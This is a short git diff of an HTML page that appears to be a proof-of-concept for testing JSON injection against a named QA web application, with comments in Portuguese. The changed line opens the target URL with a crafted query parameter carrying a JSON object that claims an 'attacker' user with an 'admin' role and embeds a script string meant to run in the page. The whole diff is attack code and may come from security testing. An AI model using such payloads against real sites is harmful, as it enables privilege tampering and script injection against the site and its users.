--- a/index.html
+++ b/index.html
@@ -38,7 +38,7 @@
     <script>
         function openTarget() {
             // Abrir a aplicação alvo com um nome de janela malicioso
-            window.open('https://qa.neoway.com.br/apps/', '{"user":"attacker","role":"admin","script":"document.querySelector(\'button\').innerText=\'Hacked!\';"}');
+            window.open('https://qa.neoway.com.br/apps/?data={"user":"attacker","role":"admin","script":"alert(\'Hacked!\');"}');
             document.getElementById('status').innerHTML = 'Aplicação alvo aberta. Verifique a nova janela para ver se a injeção de JSON foi bem-sucedida.';
         }
         // Verificar se a injeção de JSON foi bem-sucedida
